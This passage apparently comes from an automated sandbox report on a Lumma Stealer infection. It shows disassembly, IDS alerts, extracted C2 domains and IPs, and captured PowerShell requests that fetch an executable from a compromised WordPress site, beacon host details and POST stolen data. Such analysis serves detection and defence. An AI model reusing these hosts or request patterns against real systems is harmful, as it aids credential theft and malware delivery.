                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h13_2_0042ED3C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [edx]13_2_0043E5C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000B1h]13_2_00420DD9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx-692D8843h]13_2_00410DE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+34h]13_2_0041158E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [esi], cx13_2_0041158E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]13_2_00419DA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]13_2_004315A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C6BF57D2h13_2_004445A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx13_2_0041CE5F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E7863EBh]13_2_00419E60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E7863EBh]13_2_00419E60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E7863EBh]13_2_00419E60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2C331E1Fh13_2_00419E60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E7863EBh]13_2_00419E60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor ebp, ebp13_2_00419E60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ebx], ax13_2_00420670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-7D570173h]13_2_0041C631
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], si13_2_0041C631
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor byte ptr [esp+edx+5Ch], dl13_2_0042CEC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [ebp+ebx+02h], 0000h13_2_004276A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx-0Fh]13_2_00441F30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx13_2_004457F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx13_2_0042F780
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx13_2_0040E790

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.6:49710 -> 91.206.178.120:5001
                        Source: Network trafficSuricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.6:49710
                        Source: Network trafficSuricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.6:49712 -> 34.120.190.48:443
                        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49989 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49989 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49990 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49995 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49997 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49996 -> 172.67.172.121:443
                        Source: Malware configuration extractorURLs: DfreamWave.cyou
                        Source: Malware configuration extractorURLs: shiningrstars.help
                        Source: Malware configuration extractorURLs: mercharena.biz
                        Source: Malware configuration extractorURLs: generalmills.pro
                        Source: Malware configuration extractorURLs: stormlegue.com
                        Source: Malware configuration extractorURLs: blast-hubs.com
                        Source: Malware configuration extractorURLs: blastikcn.com
                        Source: Malware configuration extractorURLs: nestlecompany.pro
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49710
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 5001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49813
                        Source: global trafficTCP traffic: 192.168.2.6:49710 -> 91.206.178.120:5001
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 172.67.172.121 172.67.172.121
                        Source: Joe Sandbox ViewASN Name: ARTNET2PL ARTNET2PL
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49709 -> 104.26.12.205:80
                        Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49710 -> 91.206.178.120:5001
                        Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49813 -> 91.206.178.120:5001
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49813 -> 91.206.178.120:5001
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49990 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49996 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49997 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49992 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49995 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49991 -> 172.67.172.121:443
                        Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49712 -> 34.120.190.48:443
                        Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 34.120.190.48:443 -> 192.168.2.6:49712
                        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/header-footer-code-manager/images/TestLAB.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.littlemoroccanthings.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 43Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RANZ4SYFMY2AXZ3E9BCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12856Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4D5K2UZJCJ2WGH7NB7Cookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15102Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OAXMOCM8CGTP4BF24ZWCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19966Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8SE7FLO7B1Cookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2475Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3EJSKPNE1GCCJL4DJCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 386425Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=83035 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /script_end?random_number=83035 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.1
                        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.1
                        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.1
                        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/header-footer-code-manager/images/TestLAB.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.littlemoroccanthings.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=83035 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /script_end?random_number=83035 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: www.littlemoroccanthings.com
                        Source: global trafficDNS traffic detected: DNS query: dfreamwave.cyou
                        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dfreamwave.cyou
                        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Feb 2025 07:28:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpwnJoeSII8ItbGw7mz4fw4z4hIOX%2FXESO%2BA8b7DX17%2Ffq4o0DRhlV9fqFtdhG6Ig4uOEKQ6nxT6nI6LM0Qw4Wc06ZlWU4Ucqw9WILmScB9LXeqD9%2BzHpOvBVe5mZ0q8US4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c4d7a1d519e05-EWR
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2371135913.000000000569E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3369185807.00000290D8D35000.00000004.00000020.00020000.00000000.sdmp, wEY98gM1Jj.ps1String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000577B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=83035
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000577B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=83035$M
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3369185807.00000290D8D35000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3368973649.000000F700479000.00000004.00000010.00020000.00000000.sdmp, wEY98gM1Jj.ps1String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000569E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000569E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
                        Source: notepad.exe, 00000003.00000002.3368973649.000000F700479000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://96.170:5001/script_end?random_number=$randomNo
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3369185807.00000290D8D35000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3368973649.000000F700479000.00000004.00000010.00020000.00000000.sdmp, wEY98gM1Jj.ps1String found in binary or memory: http://api.ipify.org
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: powershell.exe, 00000000.00000002.2383933157.0000000007890000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2384360548.0000000007930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: is-IS7LO.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                        Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://ocsp.comodoca.com0
                        Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://ocsp.sectigo.com0
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000000.00000002.2371135913.0000000005461000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: cmd.exe, 00000007.00000003.2355039420.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 00000008.00000000.2355798117.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, cmd.tmp.9.dr, cmd.tmp.7.dr, cmd.exe.0.drString found in binary or memory: http://www.innosetup.com/
                        Source: cmd.exe, 00000007.00000000.2354484221.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, cmd.exe.0.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                        Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.drString found in binary or memory: http://www.opera.com0
                        Source: cmd.exe, 00000007.00000003.2355039420.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 00000008.00000000.2355798117.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, cmd.tmp.9.dr, cmd.tmp.7.dr, cmd.exe.0.drString found in binary or memory: http://www.remobjects.com/ps
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: http://www.syncovery.com0
                        Source: MSBuild.exe, 0000000D.00000002.2953557718.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://DfreamWave.cyou/
                        Source: MSBuild.exe, 0000000D.00000002.2952072079.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://DfreamWave.cyou/api
                        Source: MSBuild.exe, 0000000D.00000002.2953313467.0000000003660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://DfreamWave.cyou/pi
                        Source: MSBuild.exe, 0000000D.00000002.2952491901.000000000104F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://DfreamWave.cyou:443/apiRun
